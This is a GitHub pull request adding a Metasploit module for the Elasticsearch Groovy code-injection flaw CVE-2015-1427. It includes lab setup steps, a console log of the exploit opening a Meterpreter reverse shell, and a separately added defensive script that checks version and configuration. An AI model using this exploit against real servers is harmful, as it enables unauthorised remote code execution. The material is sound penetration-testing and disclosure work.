
Add module for CVE-2015-1427, elasticsearch groovy code injection #4907

Merged
merged 8 commits into from Mar 12, 2015

@jvazquez-r7
Contributor

jvazquez-r7 commented Mar 10, 2015

This module adds an msf module for CVE-2015-1427, an RCE in elasticsearch due to the groovy sandbox bypass discovered recently. Also improves the old script_mvel_rce check to avoid false positives.

This module has been tested with Elastic 1.4.2 on Ubuntu 12.04 server (32 bits) and Windows.

Verification

  • Install Ubuntu 12.04 server (32 bits)
  • Install openjdk jdk 7: sudo apt-get install openjdk-7-jdk
  • Install Elasticsearch 1.4.2, it can be downloaded from its homepage.
  • Execute elasticsearch `bin/elasticsearch`
  • Create one index
juan@ubuntu:~$ curl -XPUT 'http://localhost:9200/twitter/'
{"acknowledged":true}juan@ubuntu:~$ 
  • Add at least one document to the index
curl -XPUT 'http://localhost:9200/twitter/tweet/1' -d '{
> "user" : "kimchy",
> "post_date" : "2009-11-15T14:12:12",
> "message" : "trying out Elasticsearch"
> }'
{"_index":"twitter","_type":"tweet","_id":"1","_version":1,"created":true}juan@ubuntu:~$
  • Run the module, hopefully enjoy sessions
msf > use exploit/multi/elasticsearch/search_groovy_script
msf exploit(search_groovy_script) > set RHOST 172.16.158.131
RHOST => 172.16.158.131
msf exploit(search_groovy_script) > check
[+] 172.16.158.131:9200 - The target is vulnerable.
msf exploit(search_groovy_script) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(search_groovy_script) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(search_groovy_script) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.131:9200 - Checking vulnerability...
[*] 172.16.158.131:9200 - Discovering TEMP path...
[+] 172.16.158.131:9200 - TEMP path on '/tmp'
[*] 172.16.158.131:9200 - Discovering remote OS...
[+] 172.16.158.131:9200 - Remote OS is 'Linux'
[*] 172.16.158.131:9200 - Trying to load metasploit payload...
[*] Sending stage (30680 bytes) to 172.16.158.131
[+] Deleted /tmp/EmGWzsL.jar

meterpreter > getuid
sServer username: juan
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux 3.8.0-29-generic (i386)
Meterpreter : java/java
meterpreter >
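The verification above exercises a 1.4.2 node; as an added, defender-side example (not part of the PR or the Metasploit module), the script below flags whether a node's reported version falls in the ranges the vendor advisory lists for CVE-2015-1427 (1.3.0-1.3.7 and 1.4.0-1.4.2, fixed in 1.3.8 and 1.4.3) and whether elasticsearch.yml carries the advisory's mitigation, `script.groovy.sandbox.enabled: false`. The JSON and config text are constructed samples, not captured from a real host.

```python
import json
import re

# Version ranges that shipped the Groovy sandbox bypassed by CVE-2015-1427
# (per the vendor advisory; fixed in 1.3.8 and 1.4.3). Releases before 1.3.0
# used MVEL instead and belong to the separate script_mvel_rce check.
VULNERABLE_RANGES = (((1, 3, 0), (1, 3, 8)), ((1, 4, 0), (1, 4, 3)))


def parse_version(text):
    """Turn '1.4.2' (or '1.4.2-SNAPSHOT') into a comparable (major, minor, patch) tuple."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("unrecognised version string: %r" % text)
    return tuple(int(p) for p in m.groups())


def groovy_sandbox_version_exposed(version):
    """True if this release is inside one of the advisory's vulnerable ranges."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in VULNERABLE_RANGES)


def assess_root_response(body):
    """Evaluate the JSON body a node serves at GET / on port 9200."""
    info = json.loads(body)
    version = info["version"]["number"]
    return {"version": version,
            "vulnerable_version": groovy_sandbox_version_exposed(version)}


def sandbox_disabled_in_config(yaml_text):
    """True if elasticsearch.yml explicitly disables the Groovy sandbox (the advisory mitigation)."""
    for line in yaml_text.splitlines():
        line = line.split("#", 1)[0].strip()          # drop comments
        if line.startswith("script.groovy.sandbox.enabled"):
            _, _, value = line.partition(":")
            return value.strip().lower() == "false"
    return False                                     # setting absent: default on in <1.4.3


# Constructed sample of a 1.4.2 node's root response (not captured from a real host).
SAMPLE_ROOT_1_4_2 = ('{"status":200,"name":"ubuntu","version":{"number":"1.4.2",'
                     '"lucene_version":"4.10.2"},"tagline":"You Know, for Search"}')
# Constructed sample config with the mitigation applied.
SAMPLE_YML_MITIGATED = "cluster.name: es-lab\nscript.groovy.sandbox.enabled: false  # ESA mitigation\n"

if __name__ == "__main__":
    print(assess_root_response(SAMPLE_ROOT_1_4_2))
    print("mitigated:", sandbox_disabled_in_config(SAMPLE_YML_MITIGATED))
```

A node whose version is flagged and whose config lacks the setting should be upgraded; the version check alone cannot tell whether a patched build was deployed with the sandbox re-enabled.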
@carnal0wnage

carnal0wnage commented on 9e17874 Mar 11, 2015

<3 this

@jvazquez-r7

Contributor

jvazquez-r7 commented Mar 11, 2015

Thanks @carnal0wnage :-) I'm glad you think it's useful!

@wchen-r7 wchen-r7 self-assigned this Mar 12, 2015

@wchen-r7 wchen-r7 merged commit 8a452a7 into rapid7:master Mar 12, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

wchen-r7 added a commit that referenced this pull request Mar 12, 2015
